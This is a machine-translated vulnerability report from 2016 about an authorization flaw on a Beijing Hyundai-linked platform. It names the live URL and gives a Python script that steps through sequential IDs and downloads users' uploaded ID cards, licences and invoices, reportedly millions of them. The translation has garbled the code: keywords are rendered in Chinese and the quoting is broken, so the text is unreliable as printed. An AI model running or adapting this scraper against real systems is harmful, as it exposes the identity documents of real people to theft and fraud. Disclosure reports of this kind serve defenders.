漏洞标题 北京现代某平台可越权遍历所有用户上传证件(涉及几百万身份证件/行驶证件/发票/驾驶证等) 相关厂商 beijing-hyundai.com.cn 漏洞作者 路人甲 提交时间 2016-06-…
漏洞标题
北京现代的平台可以遍历所有用户上传文件(涉及数百万身份证件/驾驶证件/发票/驾驶执照等)
相关制造商
Beijing-hyundai.com.cn
漏洞作者
过路人
提交时间
2016-06-24 09: 29
公共时间
2016-06-29 09: 34
漏洞类型
未经授权的访问/许可绕过
危险等级
高
自我评估等级
15
漏洞状态
该漏洞已通知供应商,但供应商忽略了该漏洞
标签标签
漏洞详细信息
覆盖链接:
http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012
遍历身份证

使用数据,数百万个文档测试了从1400000到5431133的ID。
我写了一个批处理脚本并随机找到了100个ID。
#!/usr/bin/env python
# - * - 编码: utf-8 - * -
导入urllib
导入重新
Def getImg(id):
Url='http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=%s'%id
Resp=urllib.urlopen(url)
Imgurl=re.search(r'src='(。*?)'',resp.read())
如果imgurl.group(1)=='':
通过
否则为:
Imgurl='http://zhihuan.xd2sc.com/CarExapp/'+imgurl.group(1)
Img=urllib.urlopen(imgurl).read()
使用open(str(id)+'。jpg','wb')作为fs:
Fs.write(IMG)
如果__name__=='__ main__':
对于范围内的i(5000000,5000100):
GETIMG(ⅰ)

漏洞证明:
修理计划:
控制权
版权声明:请注明出处。居民A @乌云